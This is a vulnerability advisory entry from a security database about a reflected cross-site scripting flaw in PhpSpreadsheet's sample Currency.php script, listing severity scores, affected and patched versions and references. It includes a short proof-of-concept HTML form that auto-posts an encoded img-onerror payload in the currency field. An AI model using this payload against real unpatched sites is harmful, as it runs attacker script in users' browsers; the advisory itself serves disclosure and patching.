Fluid Attacks Database

Description

PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file

Unauthorized Reflected XSS in Currency.php file

Product: Phpspreadsheet Version: version 3.6.0 CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVSS vector v.3.1: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N) CVSS vector v.4.0: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L) Description: using the /vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php script, an attacker can perform XSS-type attack Impact: executing arbitrary JavaScript code in the browser Vulnerable component: the /vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php file Exploitation conditions: an unauthorized user Mitigation: sanitization of the currency variable Researcher: Aleksey Solovev (Positive Technologies)

Research

The researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in Currency.php file) in Phpspreadsheet.

There is no sanitization in the /vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php file, which leads to the possibility of a XSS attack. Strings are formed using the currency parameter without sanitization, controlled by an attacker.

fig9

Figure 9. A fragment of the query in which a string and a parameter are formed without sanitization

An attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.

Listing 5. HTML form that demonstrates the exploitation of the XSS vulnerability

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php" method="POST">
      <input type="hidden" name="number" value="1234&#46;5678" />
      <input type="hidden" name="currency" value="&#36;&apos;&quot;&lt;img&#32;src&#61;1&#32;onerror&#61;alert&#40;&#41;&gt;" />
      <input type="hidden" name="decimals" value="2" />
      <input type="hidden" name="position" value="1" />...

After sending the script provided in Listing 5, the XSS vulnerability is exploited. Figure 10 shows the execution of arbitrary JavaScript code during the submission of a POST form.

Figure 10. Executing arbitrary JavaScript code

Credit

This vulnerability was discovered by Aleksey Solovev (Positive Technologies)

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem	Package	Affected version	Patched versions
packagist	phpoffice/phpexcel	>=0 <=1.8.2	-
packagist	phpoffice/phpspreadsheet	>=3.0.0 <3.7.0 \|\| >=0 <1.29.7 \|\| >=2.0.0 <2.1.6 \|\| >=2.2.0 <2.3.5	3.7.0, 1.29.7, 2.1.6, 2.3.5

Aliases

1. CVE-2024-564092. NVD-2024-564093. OSV-2024-564094. GHSA-j2xg-cjcx-46775. GCVE-2024-56409

References

1. https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-j2xg-cjcx-46772. https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.